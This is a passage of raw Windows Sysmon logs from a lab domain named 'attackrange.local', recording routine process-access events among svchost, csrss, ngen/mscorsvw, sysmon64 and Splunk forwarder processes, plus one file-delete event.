14:58:55.278{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2F-607E-3A0F-00000000BB01}5768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081204Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.263{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2F-607E-3A0F-00000000BB01}5768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081203Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.263{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2F-607E-3A0F-00000000BB01}5768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081202Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.169{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2F-607E-390F-00000000BB01}5872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081201Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.169{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2F-607E-390F-00000000BB01}5872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081200Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.169{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2F-607E-390F-00000000BB01}5872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081199Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.138{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2F-607E-380F-00000000BB01}4592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081198Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.122{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2F-607E-380F-00000000BB01}4592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081197Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.122{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2F-607E-380F-00000000BB01}4592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081196Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.059{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2F-607E-370F-00000000BB01}4380C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081195Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.044{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC2F-607E-370F-00000000BB01}4380C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081194Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.044{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2F-607E-370F-00000000BB01}4380C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050637Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:55.815{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F2CEF7A9FAC7EA91F06757F7CF0E2647,SHA256=3506BA0A66E2827E17D4D297EBA0EFA9AAF623A5EF4C6271C22D555299E12EA5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000050636Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:55.518{85C0FFC9-EC2F-607E-F106-00000000BB01}14923420C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050635Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:55.408{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EC2F-607E-F106-00000000BB01}1492C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050634Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:55.408{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050633Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:55.408{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050632Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:55.408{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050631Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:55.408{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050630Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:55.408{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050629Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:55.408{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050628Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:55.408{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050627Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:55.408{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050626Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:55.408{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050625Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:55.408{85C0FFC9-B7EC-607E-0500-00000000BB01}4161008C:\Windows\system32\csrss.exe{85C0FFC9-EC2F-607E-F106-00000000BB01}1492C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050624Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:55.408{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EC2F-607E-F106-00000000BB01}1492C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 